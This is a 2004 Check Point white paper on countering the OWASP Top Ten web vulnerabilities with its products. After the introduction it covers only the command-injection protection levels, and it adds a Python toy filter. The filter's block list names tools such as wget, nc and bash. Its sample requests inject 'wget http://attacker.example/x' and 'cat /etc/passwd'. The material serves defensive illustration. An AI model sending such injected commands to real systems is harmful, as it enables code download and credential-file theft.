Mitigating the OWASP Ten Most Critical Web Application Security Problems with Check Point Solutions
In This Document

Introduction
The Top 10 Web Application Vulnerabilities and Their Remedies
  1: Unvalidated Input
  2: Broken Access Control
  3: Broken Account and Session Management
  4: Cross-Site Scripting (XSS) Flaws
  5: Buffer Overflows
  6: Injection Flaws
  7: Improper Error Handling
  8: Insecure Storage
  9: Denial of Service
  10: Insecure Configuration Management
Introduction
IT security managers face constantly changing and increasingly sophisticated challenges. At one time their concern over Internet security was focused primarily on perimeter network security, but Internet security has long since grown beyond the network perimeter. Fundamental Internet services (email, FTP, HTTP, and Telnet) have been eclipsed by a plethora of dynamic Web applications, servers, and databases that are available 24x7. These represent the infrastructure of the digital economy, making them a very attractive target for hackers. Having grown beyond the network layer, Internet security now encompasses distinct requirements for perimeter, internal, and Web application security. As Web applications become increasingly prevalent, so do the security risks and the requirements for comprehensive Web security solutions.

The Open Web Application Security Project (OWASP), a group dedicated to helping organizations recognize the security challenges intrinsic to Web applications and Web services, has documented these challenges. The OWASP Ten Most Critical Web Application Security Vulnerabilities: 2004 Update lists vulnerabilities of which every network security manager should be aware. (The document is available at http://www.owasp.org/documentation/topten.) The OWASP Top Ten identifies vulnerabilities, or security flaws, to which the majority of successful Internet-based attacks can be traced. The list focuses on vulnerabilities at the code level of applications. Usually, mitigation of such a wide range of vulnerabilities would require the deployment of multiple tools and techniques, often based on different technologies. This paper outlines how to approach each of the OWASP Top Ten Web application vulnerabilities using Check Point intelligent solutions for perimeter, internal, and Web security.
An important aspect of the Check Point approach is the ability to offer security without losing connectivity, because blocking an essential service to protect against a specific attack is rarely an acceptable solution. The methods described focus primarily on how Check Point SmartDefense (a centralized point of control against attacks) and Web Intelligence (a Web application firewall technology) can efficiently and powerfully secure Web applications before an attack can occur. Web Intelligence enables customers to configure, enforce, and update attack protections for Web servers and applications. Web Intelligence protections are designed specifically for Web-based attacks and complement the network- and application-level protections offered by SmartDefense. In addition, information and new attack defenses for Web Intelligence are provided online as part of Check Point's SmartDefense Service. Web Intelligence protects against a range of known attacks, from attacks on the Web server itself to attacks on databases used by Web applications. It also incorporates intelligent security technologies that protect against entire categories of emerging or unknown attacks. Web Intelligence features Check Point's Malicious Code Protector, Streaming Technologies, and Application Intelligence technologies.
At the HIGH security level setting, requests are blocked when any type of quote is used in the request. Quotes are usually what an attacker uses to break out of the string into which user input is concatenated. The MEDIUM level setting rejects all HTTP requests that contain operating-system commands distinctive of command injection, or non-distinctive command words that appear within quotes. The LOW level setting rejects only HTTP requests that contain distinctive operating-system commands. Command injection protection has other useful features:
- Support for multiple requests in the same connection
- Support during GET and POST form submission
- Logging of attack attempts
- Ability to set different configurations for each Web server
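As an added example (not Check Point's code, and not a description of how Web Intelligence is implemented internally), the following Python models the three levels as a filter over the GET query string and POST form body of a request. The distinctive and non-distinctive command word lists, the assumption that each level also applies the checks of the levels below it, the log-line format, and the sample requests are all constructed for this illustration.

```python
"""
Toy model of a three-level command-injection filter for HTTP requests.

Added illustration for this page; it is not Check Point's Web Intelligence
engine. The word lists, the cumulative-level assumption and the sample
requests below are constructed for the example.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Commands that almost never occur in legitimate form input (assumed list).
DISTINCTIVE_COMMANDS = {"wget", "curl", "nc", "netcat", "chmod", "bash",
                        "/bin/sh", "/bin/bash", "xterm", "tftp", "nslookup"}
# Words that are OS commands but also ordinary English words; treated as
# suspicious only when they appear inside quotes (assumed list).
NON_DISTINCTIVE_WORDS = {"cat", "ls", "id", "echo", "find", "kill", "ping",
                         "sort", "head", "tail", "more"}

QUOTE_RE = re.compile(r"""['"`]""")
QUOTED_RE = re.compile(r"""(['"`])(.*?)\1""", re.S)   # text between matching quotes
WORD_RE = re.compile(r"[A-Za-z_/][A-Za-z0-9_./-]*")   # shell-like word tokens


def _words(text):
    return {w.lower() for w in WORD_RE.findall(text)}


def classify_value(value, level):
    """Return the reason a decoded parameter value is rejected at `level`, or None."""
    if level not in ("HIGH", "MEDIUM", "LOW"):
        raise ValueError("level must be HIGH, MEDIUM or LOW")
    # HIGH: any quote character is enough, since a quote is what an attacker
    # uses to break out of a quoted argument in a command string.
    if level == "HIGH" and QUOTE_RE.search(value):
        return "quote character present"
    # All levels: distinctive OS commands anywhere in the value.
    hit = _words(value) & DISTINCTIVE_COMMANDS
    if hit:
        return "distinctive OS command: " + ", ".join(sorted(hit))
    # MEDIUM and above: common words that are also commands, but only inside quotes.
    if level != "LOW":
        for _quote, inner in QUOTED_RE.findall(value):
            hit = _words(inner) & NON_DISTINCTIVE_WORDS
            if hit:
                return "non-distinctive command word inside quotes: " + ", ".join(sorted(hit))
    return None


def check_request(method, target, body, level):
    """Inspect GET query parameters and POST form fields; return [(param, reason), ...]."""
    params = list(parse_qsl(urlsplit(target).query, keep_blank_values=True))
    if method.upper() == "POST":
        params += parse_qsl(body, keep_blank_values=True)
    findings = []
    for name, value in params:
        reason = classify_value(value, level)
        if reason:
            findings.append((name, reason))
    return findings


def decide(method, target, body, level):
    """Return ('BLOCK', log_lines) or ('ALLOW', []) for one request."""
    findings = check_request(method, target, body, level)
    log = ["cmd-injection level=%s %s %s param=%s reason=%s"
           % (level, method, urlsplit(target).path, name, reason)
           for name, reason in findings]
    return ("BLOCK" if findings else "ALLOW"), log


if __name__ == "__main__":
    # Constructed sample traffic: a legitimate value containing an
    # apostrophe, and two injection attempts (one using a distinctive
    # command, one hiding a common word inside quotes).
    samples = [
        ("GET", "/search?q=O%27Brien", ""),
        ("POST", "/ping", "host=127.0.0.1%3Bwget+http%3A%2F%2Fattacker.example%2Fx"),
        ("POST", "/view", "file=%22%3Bcat+%2Fetc%2Fpasswd%3B%22"),
    ]
    for level in ("LOW", "MEDIUM", "HIGH"):
        for method, target, body in samples:
            verdict, log = decide(method, target, body, level)
            print("%-6s %-5s %s %s %s" % (level, verdict, method, target, body))
            for line in log:
                print("   ", line)
```

Running the three constructed requests through each level shows the trade-off behind the settings: HIGH rejects the legitimate value O'Brien because of the apostrophe, so free-text fields may need the MEDIUM or LOW setting (or a separate per-server configuration, as the feature list above allows), while LOW lets ";cat /etc/passwd;" through because cat is an ordinary English word that the filter only treats as a command when it is quoted.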
CHECK POINT OFFICES: International Headquarters: 3A Jabotinsky Street, 24th Floor Ramat Gan 52520, Israel Tel: 972-3-753 4555 Fax: 972-3-575 9256 e-mail: info@CheckPoint.com U.S. Headquarters: 800 Bridge Parkway Redwood City, CA 94065 Tel: 800-429-4391 ; 650-628-2000 Fax: 650-654-4233 URL: http://www.checkpoint.com
2004 Check Point Software Technologies Ltd. All rights reserved. Check Point, Application Intelligence, Check Point Express, the Check Point logo, ClusterXL, ConnectControl, Connectra, CoSa, Cooperative Security Alliance, FireWall-1, FireWall-1 GX, FireWall-1 SecureServer, FloodGate-1, Hacker ID, INSPECT, INSPECT XL, InterSpect, IQ Engine, Open Security Extension, OPSEC, Provider-1, Safe@Home, Safe@Office, SecureClient, SecureKnowledge, SecurePlatform, SecurRemote, SecurServer, SecureUpdate, SecureXL, SiteManager-1, SmartCenter, SmartCenter Pro, SmartDashboard, SmartDefense, SmartLSM, SmartMap, SmartUpdate, SmartView, SmartView Monitor, SmartView Reporter, SmartView Status, SmartViewTracker, SofaWare, SSL Network Extender, UAM, User-to-Address Mapping, UserAuthority, VPN-1, VPN-1 Accelerator Card, VPN-1 Edge, VPN-1 Pro, VPN-1 SecureClient, VPN-1 SecuRemote, VPN-1 SecureServer, VPN-1 VSX, Web Intelligence, TrueVector, ZoneAlarm, Zone Alarm Pro, Zone Labs, the Zone Labs logo, AlertAdvisor, Cooperative Enforcement, IMsecure, Policy Lifecycle Management, Zone Labs Integrity and Smarter Security are trademarks or registered trademarks of Check Point Software Technologies Ltd. or its affiliates. All other product names mentioned herein are trademarks or registered trademarks of their respective owners. The products described in this document are protected by U.S. Patent No. 5,606,668, 5,835,726 and 6,496,935 and may be protected by other U.S. Patents, foreign patents, or pending applications. June XX, 2004 PN: 000000